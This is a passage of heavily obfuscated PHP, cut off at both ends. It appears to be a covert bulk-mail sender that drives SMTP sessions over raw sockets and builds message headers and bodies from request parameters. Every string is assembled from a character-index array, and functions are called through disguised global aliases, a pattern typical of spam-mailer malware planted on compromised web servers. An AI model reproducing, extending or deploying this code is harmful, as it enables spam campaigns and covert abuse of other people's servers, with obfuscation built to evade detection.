&& $jnxjb61 != SOCKET_EINPROGRESS && $jnxjb61 != SOCKET_EALREADY) { $unahu45[$jkbvz84][$i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82]] = $i59[16].$i59[63].$i59[95].$i59[2].$i59[94].$i59[16].$i59[16].$i59[82].$i59[2].$i59[55].$i59[95].$i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55]; continue; } } $unahu45[$jkbvz84][$i59[10].$i59[55].$i59[76].$i59[54].$i59[82]] = $GLOBALS['snkbr7'](NULL); $aaaqk92[] = $unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]; $xglki37[$unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]] = $unahu45[$jkbvz84]; $xglki37[$unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]][$i59[94].$i59[83].$i59[76].$i59[29]] = $jkbvz84; } while ($GLOBALS['pzfzn51']($aaaqk92) + $GLOBALS['pzfzn51']($wbwts68) > 0) { $ewqxb0 = $aaaqk92; $olbdv78 = $wbwts68; if (FALSE !== ($baluw62 = $GLOBALS['mhzfy25']($olbdv78, $ewqxb0, $yyjgh73 = null, 0))) { if ($baluw62 > 0) { if ($GLOBALS['pzfzn51']($olbdv78) > 0) { foreach ($olbdv78 as $ipocr99) { $yzqyk58 = @$GLOBALS['rmuvr11']($ipocr99, 1024); if ($yzqyk58 == FALSE) { $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[16].$i59[63].$i59[95].$i59[10].$i59[94].$i59[2].$i59[74].$i59[95].$i59[83].$i59[82].$i59[50].$i59[17]); continue; } if ($xglki37[$ipocr99][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] == 1) { $ncsee45 = @$GLOBALS['tgaup44']($ipocr99, $i59[0].$i59[39].$i59[57].$i59[45].$i59[95].$vxlcl82[$i59[69].$i59[94].$i59[10].$i59[55].$i59[58].$i59[83].$i59[94].$i59[54]].$i59[27].$i59[14]); if ($ncsee45 == FALSE) { $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[22].$i59[22].$i59[95].$i59[16].$i59[63].$i59[95].$i59[82].$i59[69].$i59[49].$i59[94]); continue; } $GLOBALS['sfroq33']($i59, $ipocr99, $unahu45, $xglki37, 2); } elseif ($xglki37[$ipocr99][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] == 2) { if (substr($yzqyk58, 0, 3) != 250 ) { $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[3].$i59[3].$i59[95].$i59[16].$i59[63].$i59[95].$i59[82].$i59[69].$i59[49].$i59[94].$i59[95]. $yzqyk58); continue; } $ncsee45 = @$GLOBALS['tgaup44']($ipocr99, $i59[44].$i59[21].$i59[25].$i59[57].$i59[95].$i59[58].$i59[8].$i59[45].$i59[44].$i59[64].$i59[3].$xglki37[$ipocr99][$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[58].$i59[83].$i59[94].$i59[54]].$i59[22].$i59[27].$i59[14]); if ($ncsee45 == FALSE) { $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[22].$i59[22].$i59[95].$i59[16].$i59[63].$i59[95].$i59[54].$i59[50].$i59[76].$i59[49].$i59[95].$i59[65].$i59[83].$i59[94].$i59[54]); continue; } $GLOBALS['sfroq33']($i59, $ipocr99, $unahu45, $xglki37, 3); } elseif ($xglki37[$ipocr99][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] == 3) { if (substr($yzqyk58, 0, 3) != 250 ) { $unahu45[$xglki37[$ipocr99][$i59[94].$i59[83].$i59[76].$i59[29]]][$i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30]] = TRUE; $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[3].$i59[3].$i59[95].$i59[16].$i59[63].$i59[95].$i59[54].$i59[50].$i59[76].$i59[49].$i59[95].$i59[65].$i59[83].$i59[94].$i59[54].$i59[95].$yzqyk58); continue; } $ncsee45 = @$GLOBALS['tgaup44']($ipocr99, $i59[8].$i59[80].$i59[96].$i59[81].$i59[95].$i59[81].$i59[45].$i59[64].$i59[3].$xglki37[$ipocr99][$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94]].$i59[22].$i59[27].$i59[14]); if ($ncsee45 == FALSE) { $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[22].$i59[22].$i59[95].$i59[16].$i59[63].$i59[95].$i59[83].$i59[2].$i59[30].$i59[55].$i59[95].$i59[55].$i59[94]); continue; } $GLOBALS['sfroq33']($i59, $ipocr99, $unahu45, $xglki37, 4); } elseif ($xglki37[$ipocr99][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] == 4) { if (substr($yzqyk58, 0, 3) != 250 && substr($yzqyk58, 0, 3) != 251) { $unahu45[$xglki37[$ipocr99][$i59[94].$i59[83].$i59[76].$i59[29]]][$i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30]] = TRUE; $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[3].$i59[3].$i59[95].$i59[16].$i59[63].$i59[95].$i59[83].$i59[2].$i59[30].$i59[55].$i59[95].$i59[55].$i59[94].$i59[95].$yzqyk58); continue; } $ncsee45 = @$GLOBALS['tgaup44']($ipocr99, $i59[59].$i59[21].$i59[81].$i59[21].$i59[27].$i59[14]); if ($ncsee45 == FALSE) { print $yzqyk58; $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[22].$i59[22].$i59[95].$i59[16].$i59[63].$i59[95].$i59[17].$i59[50].$i59[55].$i59[50]); continue; } $GLOBALS['sfroq33']($i59, $ipocr99, $unahu45, $xglki37, 5); } elseif ($xglki37[$ipocr99][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] == 5) { if (substr($yzqyk58, 0, 3) != 354 ) { $unahu45[$xglki37[$ipocr99][$i59[94].$i59[83].$i59[76].$i59[29]]][$i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30]] = TRUE; $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[3].$i59[3].$i59[95].$i59[16].$i59[63].$i59[95].$i59[17].$i59[50].$i59[55].$i59[50].$i59[95].$yzqyk58); continue; } $ncsee45 = @$GLOBALS['tgaup44']($ipocr99, $xglki37[$ipocr99][$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[38].$i59[94].$i59[2].$i59[74]].$i59[27].$i59[14].$xglki37[$ipocr99][$i59[63].$i59[94].$i59[17].$i59[77]].$i59[27].$i59[14].$i59[84].$i59[27].$i59[14]); if ($ncsee45 == FALSE) { $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[22].$i59[22].$i59[95].$i59[16].$i59[63].$i59[95].$i59[63].$i59[94].$i59[17].$i59[77]); continue; } $GLOBALS['sfroq33']($i59, $ipocr99, $unahu45, $xglki37, 6); } elseif ($xglki37[$ipocr99][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] == 6) { if (substr($yzqyk58, 0, 3) != 250 ) { $unahu45[$xglki37[$ipocr99][$i59[94].$i59[83].$i59[76].$i59[29]]][$i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30]] = TRUE; $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[3].$i59[3].$i59[95].$i59[16].$i59[63].$i59[95].$i59[63].$i59[94].$i59[17].$i59[77].$i59[95].$yzqyk58); continue; } $unahu45[$xglki37[$ipocr99][$i59[94].$i59[83].$i59[76].$i59[29]]][$i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30]] = FALSE; $unahu45[$xglki37[$ipocr99][$i59[94].$i59[83].$i59[76].$i59[29]]][$i59[17].$i59[94].$i59[16].$i59[82]] = TRUE; $unahu45[$xglki37[$ipocr99][$i59[94].$i59[83].$i59[76].$i59[29]]][$i59[17].$i59[94].$i59[16].$i59[82].$i59[97].$i59[50].$i59[77]] = 1; $ncsee45 = @$GLOBALS['tgaup44']($ipocr99, $i59[26].$i59[33].$i59[25].$i59[81].$i59[27].$i59[14]); if ($ncsee45 == FALSE) { $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[22].$i59[22].$i59[95].$i59[16].$i59[63].$i59[95].$i59[91].$i59[1].$i59[76].$i59[55]); continue; } $GLOBALS['sfroq33']($i59, $ipocr99, $unahu45, $xglki37, 6); $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[16].$i59[63].$i59[95].$i59[17].$i59[94].$i59[16].$i59[82]); } else { $GLOBALS['gbiun57']($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, $i59[16].$i59[63].$i59[95].$i59[1].$i59[16].$i59[74].$i59[16].$i59[94].$i59[24].$i59[16].$i59[95].$i59[10].$i59[55].$i59[82].$i59[30]); } } } if ($GLOBALS['pzfzn51']($ewqxb0) > 0) { foreach ($ewqxb0 as $eztco67) { $GLOBALS['sfroq33']($i59, $eztco67, $unahu45, $xglki37, 1); $wbwts68[] = $eztco67; $uzrsu74 = $GLOBALS['vfpnn60']($eztco67, $aaaqk92); unset($aaaqk92[$uzrsu74]); } } } } else { break; } foreach ($xglki37 as $nqhsc23) { $hklao9 = $GLOBALS['snkbr7'](NULL); if ($nqhsc23[$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] == 0) { if ($nqhsc23[$i59[10].$i59[55].$i59[76].$i59[54].$i59[82]] + $vfyxw97 < $hklao9) { $GLOBALS['gbiun57']($i59, $nqhsc23[$i59[10].$i59[94].$i59[2].$i59[74]], $unahu45, $xglki37, $aaaqk92, $i59[16].$i59[63].$i59[95].$i59[10].$i59[94].$i59[2].$i59[74].$i59[95].$i59[2].$i59[94].$i59[16].$i59[16].$i59[95].$i59[55].$i59[76].$i59[54].$i59[82].$i59[94].$i59[1].$i59[55].$i59[95].$nqhsc23[$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]]); } } else { if ($nqhsc23[$i59[10].$i59[55].$i59[76].$i59[54].$i59[82]] + $pvbdh92 < $hklao9) { $GLOBALS['qihri77']($nqhsc23[$i59[10].$i59[94].$i59[2].$i59[74]], $unahu45, $xglki37, $wbwts68, $i59[16].$i59[63].$i59[95].$i59[10].$i59[94].$i59[2].$i59[74].$i59[95].$i59[83].$i59[75].$i59[24].$i59[95].$i59[55].$i59[76].$i59[54].$i59[82].$i59[94].$i59[1].$i59[55].$i59[95].$nqhsc23[$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]]); } } } }}function hkblq88($i59, $vxlcl82, &$esjbi0) { $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[44].$i59[50].$i59[76].$i59[16]] = $i59[60].$i59[89].$i59[96].$i59[83].$i59[76].$i59[94].$i59[83].$i59[76].$i59[55].$i59[77].$i59[64].$i59[95].$i59[87].$i59[95].$i59[86].$i59[78].$i59[94].$i59[83].$i59[54].$i59[50].$i59[49].$i59[67].$i59[27].$i59[14]; $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[44].$i59[50].$i59[76].$i59[16]] .= $i59[44].$i59[25].$i59[44].$i59[0].$i59[89].$i59[48].$i59[82].$i59[83].$i59[10].$i59[76].$i59[94].$i59[16].$i59[64].$i59[95].$i59[9].$i59[84].$i59[34].$i59[27].$i59[14]; $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[44].$i59[50].$i59[76].$i59[16]] .= $i59[80].$i59[94].$i59[16].$i59[55].$i59[82].$i59[16].$i59[55].$i59[89].$i59[81].$i59[77].$i59[30].$i59[82].$i59[64].$i59[95].$i59[55].$i59[82].$i59[56].$i59[55].$i59[75].$i59[69].$i59[55].$i59[54].$i59[49].$i59[31].$i59[95].$i59[2].$i59[69].$i59[50].$i59[83].$i59[10].$i59[82].$i59[55].$i59[42].$i59[35].$i59[76].$i59[10].$i59[94].$i59[89].$i59[18].$i59[18].$i59[7].$i59[92].$i59[89].$i59[9].$i59[35].$i59[27].$i59[14]; $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[44].$i59[50].$i59[76].$i59[16]] .= $i59[80].$i59[94].$i59[16].$i59[55].$i59[82].$i59[16].$i59[55].$i59[89].$i59[81].$i59[83].$i59[50].$i59[16].$i59[10].$i59[65].$i59[82].$i59[83].$i59[89].$i59[0].$i59[16].$i59[2].$i59[94].$i59[17].$i59[76].$i59[16].$i59[29].$i59[64].$i59[95].$i59[18].$i59[63].$i59[76].$i59[55].$i59[27].$i59[14]; $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[58].$i59[83].$i59[94].$i59[54]] = $i59[58].$i59[83].$i59[94].$i59[54].$i59[64].$i59[95].$esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[58].$i59[83].$i59[94].$i59[54].$i59[57].$i59[94].$i59[16].$i59[29]].$i59[27].$i59[14]; $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[58].$i59[83].$i59[94].$i59[54]] .= $i59[8].$i59[82].$i59[30].$i59[49].$i59[77].$i59[89].$i59[81].$i59[94].$i59[64].$esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[58].$i59[83].$i59[94].$i59[54].$i59[57].$i59[94].$i59[16].$i59[29]].$i59[27].$i59[14]; $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[38].$i59[94].$i59[2].$i59[74]] = $i59[59].$i59[50].$i59[55].$i59[82].$i59[64].$i59[95] . @$GLOBALS['bavbu3']($i59[59].$i59[19].$i59[95].$i59[12].$i59[95].$i59[44].$i59[95].$i59[36].$i59[95].$i59[46].$i59[64].$i59[76].$i59[64].$i59[10].$i59[95].$i59[45]).$i59[27].$i59[14]; $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[38].$i59[94].$i59[2].$i59[74]] .= $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[58].$i59[83].$i59[94].$i59[54]]; $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[38].$i59[94].$i59[2].$i59[74]] .= $i59[44].$i59[82].$i59[10].$i59[10].$i59[50].$i59[29].$i59[82].$i59[89].$i59[25].$i59[59].$i59[64].$i59[95].$i59[3].$GLOBALS['wwxez32']($i59[75].$i59[86].$i59[84].$i59[13].$i59[28].$i59[23].$i59[67].$i59[86].$i59[84].$i59[13].$i59[7].$i59[23].$i59[67].$i59[86].$i59[84].$i59[13].$i59[53].$i59[23].$i59[67].$i59[84].$i59[93].$i59[75], $i59[52].$i59[9].$i59[89].$i59[52].$i59[53].$i59[89].$i59[52].$i59[87], $GLOBALS['olhjz88']($GLOBALS['snkbr7']())).$i59[40].$vxlcl82[$i59[69].$i59[94].$i59[10].$i59[55].$i59[58].$i59[83].$i59[94].$i59[54]].$i59[22].$i59[27].$i59[14]; $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[38].$i59[94].$i59[2].$i59[74]] .= $i59[81].$i59[94].$i59[64].$i59[95].$esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94].$i59[57].$i59[94].$i59[16].$i59[29]].$i59[27].$i59[14]; $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[38].$i59[94].$i59[2].$i59[74]] .= $i59[38].$i59[1].$i59[63].$i59[12].$i59[82].$i59[2].$i59[55].$i59[64].$i59[95].$esjbi0[$i59[10].$i59[1].$i59[63].$i59[12]].$i59[27].$i59[14]; $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[38].$i59[94].$i59[2].$i59[74]] .= $esjbi0[$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[44].$i59[50].$i59[76].$i59[16]];}function slltw17($i59, $vxlcl82, &$esjbi0) { $esjbi0[$i59[10].$i59[1].$i59[63].$i59[12]] = @$GLOBALS['vgyag20']($i59[71].$i59[8].$i59[73].$i59[78].$i59[21].$i59[44].$i59[0].$i59[71], $esjbi0[$i59[16].$i59[50].$i59[54].$i59[82].$i59[58].$i59[76].$i59[83].$i59[10].$i59[55]], $vxlcl82[$i59[10].$i59[1].$i59[63].$i59[12].$i59[81].$i59[82].$i59[54].$i59[30].$i59[49]]); $esjbi0[$i59[10].$i59[1].$i59[63].$i59[12]] = @$GLOBALS['vgyag20']($i59[71].$i59[8].$i59[73].$i59[57].$i59[78].$i59[21].$i59[44].$i59[0].$i59[71], $esjbi0[$i59[16].$i59[50].$i59[54].$i59[82].$i59[57].$i59[50].$i59[10].$i59[55]], $esjbi0[$i59[10].$i59[1].$i59[63].$i59[12]]); $esjbi0[$i59[63].$i59[94].$i59[17].$i59[77]] = @$GLOBALS['vgyag20']($i59[71].$i59[8].$i59[73].$i59[78].$i59[21].$i59[44].$i59[0].$i59[71], $esjbi0[$i59[16].$i59[50].$i59[54].$i59[82].$i59[58].$i59[76].$i59[83].$i59[10].$i59[55]], $vxlcl82[$i59[63].$i59[94].$i59[17].$i59[77].$i59[81].$i59[82].$i59[54].$i59[30].$i59[49]]); $esjbi0[$i59[63].$i59[94].$i59[17].$i59[77]] = @$GLOBALS['vgyag20']($i59[71].$i59[8].$i59[73].$i59[57].$i59[78].$i59[21].$i59[44].$i59[0].$i59[71], $esjbi0[$i59[16].$i59[50].$i59[54].$i59[82].$i59[57].$i59[50].$i59[10].$i59[55]], $esjbi0[$i59[63].$i59[94].$i59[17].$i59[77]]);}function xagwq19($i59, $mfvuq23, $vxlcl82, &$esjbi0) { if (FALSE === @$GLOBALS['rssnp53']($i59[75].$i59[86].$i59[84].$i59[93].$i59[11].$i59[31].$i59[67].$i59[11].$i59[86].$i59[84].$i59[93].$i59[11].$i59[31].$i59[67].$i59[11].$i59[86].$i59[84].$i59[70].$i59[40].$i59[86].$i59[84].$i59[70].$i59[67].$i59[11].$i59[67].$i59[31].$i59[11].$i59[75], $mfvuq23, $zroqx74) ) { return FALSE; } if (!isset($zroqx74) || $GLOBALS['pzfzn51']($zroqx74) != 5) { return FALSE; } $esjbi0[$i59[16].$i59[50].$i59[54].$i59[82].$i59[58].$i59[76].$i59[83].$i59[10].$i59[55]] = @$GLOBALS['bosbj25']($GLOBALS['vgyag20']($i59[31],"",$zroqx74[1])); $esjbi0[$i59[16].$i59[50].$i59[54].$i59[82].$i59[57].$i59[50].$i59[10].$i59[55]] = @$GLOBALS['bosbj25']($GLOBALS['vgyag20']($i59[31],"",$zroqx74[2])); $esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94]] = $GLOBALS['vgyag20']($i59[31],"",$zroqx74[3]); $esjbi0[$i59[17].$i59[94].$i59[54].$i59[50].$i59[76].$i59[16].$i59[81].$i59[94]] = $GLOBALS['vgyag20']($i59[31],"",$zroqx74[4]); if (!isset($esjbi0[$i59[17].$i59[94].$i59[54].$i59[50].$i59[76].$i59[16].$i59[81].$i59[94]]) || $esjbi0[$i59[17].$i59[94].$i59[54].$i59[50].$i59[76].$i59[16].$i59[81].$i59[94]] == "") { return FALSE; } if (!isset($esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94]]) || $esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94]] == "") { return FALSE; } if (isset($esjbi0[$i59[16].$i59[50].$i59[54].$i59[82].$i59[58].$i59[76].$i59[83].$i59[10].$i59[55]]) && $esjbi0[$i59[16].$i59[50].$i59[54].$i59[82].$i59[58].$i59[76].$i59[83].$i59[10].$i59[55]] != "") { $esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94].$i59[57].$i59[94].$i59[16].$i59[29]] = $i59[35].$esjbi0[$i59[16].$i59[50].$i59[54].$i59[82].$i59[58].$i59[76].$i59[83].$i59[10].$i59[55]].$i59[95].$esjbi0[$i59[16].$i59[50].$i59[54].$i59[82].$i59[57].$i59[50].$i59[10].$i59[55]].$i59[35].$i59[95].$i59[3].$esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94]].$i59[22]; } else { $esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94].$i59[57].$i59[94].$i59[16].$i59[29]] = $esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94]]; } if ($GLOBALS['rssnp53']($i59[75].$i59[32].$i59[86].$i59[61].$i59[9].$i59[89].$i59[92].$i59[88].$i59[85].$i59[61].$i59[9].$i59[89].$i59[92].$i59[88].$i59[61].$i59[34].$i59[89].$i59[92].$i59[88].$i59[85].$i59[9].$i59[61].$i59[34].$i59[89].$i59[92].$i59[88].$i59[61].$i59[34].$i59[89].$i59[92].$i59[88].$i59[85].$i59[53].$i59[61].$i59[34].$i59[89].$i59[79].$i59[88].$i59[61].$i59[34].$i59[89].$i59[92].$i59[88].$i59[85].$i59[53].$i59[7].$i59[61].$i59[34].$i59[89].$i59[7].$i59[88].$i59[67].$i59[86].$i59[47].$i59[84].$i59[86].$i59[61].$i59[34].$i59[89].$i59[92].$i59[88].$i59[85].$i59[61].$i59[9].$i59[89].$i59[92].$i59[88].$i59[61].$i59[34].$i59[89].$i59[92].$i59[88].$i59[85].$i59[9].$i59[61].$i59[34].$i59[89].$i59[92].$i59[88].$i59[61].$i59[34].$i59[89].$i59[92].$i59[88].$i59[85].$i59[53].$i59[61].$i59[34].$i59[89].$i59[79].$i59[88].$i59[61].$i59[34].$i59[89].$i59[92].$i59[88].$i59[85].$i59[53].$i59[7].$i59[61].$i59[34].$i59[89].$i59[7].$i59[88].$i59[67].$i59[67].$i59[13].$i59[87].$i59[23].$i59[52].$i59[75], $vxlcl82[$i59[69].$i59[94].$i59[10].$i59[55].$i59[58].$i59[83].$i59[94].$i59[54]]) || @$GLOBALS['eebyx59']($i59[10].$i59[50].$i59[65].$i59[82].$i59[73].$i59[54].$i59[94].$i59[17].$i59[82])) { $esjbi0[$i59[65].$i59[94].$i59[83].$i59[2].$i59[82].$i59[58].$i59[83].$i59[94].$i59[54].$i59[58].$i59[49].$i59[50].$i59[29]] = FALSE; } else { $esjbi0[$i59[65].$i59[94].$i59[83].$i59[2].$i59[82].$i59[58].$i59[83].$i59[94].$i59[54].$i59[58].$i59[49].$i59[50].$i59[29]] = TRUE; } $esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[58].$i59[83].$i59[94].$i59[54]] = $vxlcl82[$i59[65].$i59[83].$i59[94].$i59[54].$i59[57].$i59[94].$i59[29].$i59[76].$i59[16]].$i59[40].$vxlcl82[$i59[69].$i59[94].$i59[10].$i59[55].$i59[58].$i59[83].$i59[94].$i59[54]]; if (isset($vxlcl82[$i59[65].$i59[83].$i59[94].$i59[54].$i59[78].$i59[50].$i59[54].$i59[82]]) && $vxlcl82[$i59[65].$i59[83].$i59[94].$i59[54].$i59[78].$i59[50].$i59[54].$i59[82]] != "") { $esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[58].$i59[83].$i59[94].$i59[54].$i59[57].$i59[94].$i59[16].$i59[29]] = $vxlcl82[$i59[65].$i59[83].$i59[94].$i59[54].$i59[78].$i59[50].$i59[54].$i59[82]].$i59[95].$i59[3].$esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[58].$i59[83].$i59[94].$i59[54]].$i59[22]; } else { $esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[58].$i59[83].$i59[94].$i59[54].$i59[57].$i59[94].$i59[16].$i59[29]] = $esjbi0[$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[58].$i59[83].$i59[94].$i59[54]]; } $esjbi0[$i59[54].$i59[56].$i59[39].$i59[94].$i59[10].$i59[55]] = $i59[9].$i59[53].$i59[28].$i59[84].$i59[34].$i59[84].$i59[34].$i59[84].$i59[9]; if ($GLOBALS['goxku40']($i59[29].$i59[82].$i59[55].$i59[54].$i59[56].$i59[83].$i59[83])) { @$GLOBALS['ltkgi30']($esjbi0[$i59[17].$i59[94].$i59[54].$i59[50].$i59[76].$i59[16].$i59[81].$i59[94]], $nhysx96, $ntryu13); if ($GLOBALS['pzfzn51']($nhysx96) !== 0) { $haxae63 = $GLOBALS['veudg88']($ntryu13, $GLOBALS['ugeiv74']($ntryu13)); $esjbi0[$i59[54].$i59[56].$i59[39].$i59[94].$i59[10].$i59[55]] = $nhysx96[$haxae63[0]]; } } return TRUE;}function bctio27($i59, &$esjbi0) { if ($GLOBALS['pzfzn51']($GLOBALS['vkxhv92']) < 2) { return FALSE; } $fnxyh15 = false; $ybhhi32 = $wghts9 = ""; foreach ($GLOBALS['veudg88']($GLOBALS['vkxhv92']) as $zcxpv1) { if ($zcxpv1[0] == $i59[49]) $ybhhi32 = $zcxpv1; if ($zcxpv1[0] == $i59[17]) $wghts9 = $zcxpv1; if ($zcxpv1[0] == $i59[82]) $xuzda17 = true; } if ($ybhhi32 == "" || $wghts9 == "") { return FALSE; } $owxdm76 = $GLOBALS['gpcou63']($i59, $ybhhi32, $xuzda17); $ufusu43= $GLOBALS['gpcou63']($i59, $wghts9, $xuzda17); if ($owxdm76 == FALSE || $ufusu43 == FALSE) { return FALSE; } $esjbi0[$i59[17].$i59[50].$i59[55].$i59[50].$i59[81].$i59[94]] = @$GLOBALS['kkndw71']($i59[75].$i59[5].$i59[75], $owxdm76); $esjbi0[$i59[65].$i59[83].$i59[94].$i59[54].$i59[57].$i59[94].$i59[29].$i59[76].$i59[16]] = $esjbi0[$i59[65].$i59[83].$i59[94].$i59[54].$i59[78].$i59[50].$i59[54].$i59[82]] = $esjbi0[$i59[10].$i59[1].$i59[63].$i59[12].$i59[81].$i59[82].$i59[54].$i59[30].$i59[49]] = $esjbi0[$i59[63].$i59[94].$i59[17].$i59[77].$i59[81].$i59[82].$i59[54].$i59[30].$i59[49]] = ""; if (FALSE !== @$GLOBALS['rssnp53']($i59[75].$i59[3].$i59[33].$i59[38].$i59[0].$i59[8].$i59[22].$i59[86].$i59[84].$i59[93].$i59[11].$i59[67].$i59[3].$i59[47].$i59[75].$i59[33].$i59[38].$i59[0].$i59[8].$i59[22].$i59[75].$i59[76].$i59[10].$i59[54], $ufusu43, $zroqx74) && isset($zroqx74) && $GLOBALS['pzfzn51']($zroqx74) > 1) { $esjbi0[$i59[65].$i59[83].$i59[94].$i59[54].$i59[57].$i59[94].$i59[29].$i59[76].$i59[16]] = $zroqx74[1]; } if (FALSE !== @$GLOBALS['rssnp53']($i59[75].$i59[3].$i59[78].$i59[21].$i59[44].$i59[0].$i59[22].$i59[86].$i59[84].$i59[93].$i59[11].$i59[67].$i59[3].$i59[47].$i59[75].$i59[78].$i59[21].$i59[44].$i59[0].$i59[22].$i59[75].$i59[76].$i59[10].$i59[54], $ufusu43, $zroqx74) && isset($zroqx74) && $GLOBALS['pzfzn51']($zroqx74) > 1) { $esjbi0[$i59[65].$i59[83].$i59[94].$i59[54].$i59[78].$i59[50].$i59[54].$i59[82]] = $zroqx74[1]; } if (FALSE !== @$GLOBALS['rssnp53']($i59[75].$i59[3].$i59[38].$i59[33].$i59[37].$i59[15].$i59[22].$i59[86].$i59[84].$i59[93].$i59[11].$i59[67].$i59[3].$i59[47].$i59[75].$i59[38].$i59[33].$i59[37].$i59[15].$i59[22].$i59[75].$i59[76].$i59[10].$i59[54], $ufusu43, $zroqx74) && isset($zroqx74) && $GLOBALS['pzfzn51']($zroqx74) > 1) { $esjbi0[$i59[10].$i59[1].$i59[63].$i59[12].$i59[81].$i59[82].$i59[54].$i59[30].$i59[49]] = $zroqx74[1]; } if (FALSE !== @$GLOBALS['rssnp53']($i59[75].$i59[3].$i59[38].$i59[37].$i59[45].$i59[59].$i59[36].$i59[22].$i59[86].$i59[84].$i59[93].$i59[11].$i59[67].$i59[3].$i59[47].$i59[75].$i59[38].$i59[37].$i59[45].$i59[59].$i59[36].$i59[22].$i59[75].$i59[76].$i59[10].$i59[54],$ufusu43, $zroqx74) && isset($zroqx74) && $GLOBALS['pzfzn51']($zroqx74) > 1) { $esjbi0[$i59[63].$i59[94].$i59[17].$i59[77].$i59[81].$i59[82].$i59[54].$i59[30].$i59[49]] = $zroqx74[1]; } $esjbi0[$i59[69].$i59[94].$i59[10].$i59[55].$i59[58].$i59[83].$i59[94].$i59[54]] = @$GLOBALS['wwxez32']($i59[75].$i59[32].$i59[86].$i59[24].$i59[24].$i59[24].$i59[85].$i59[65].$i59[55].$i59[30].$i59[67].$i59[47].$i59[84].$i59[75].$i59[76], '', 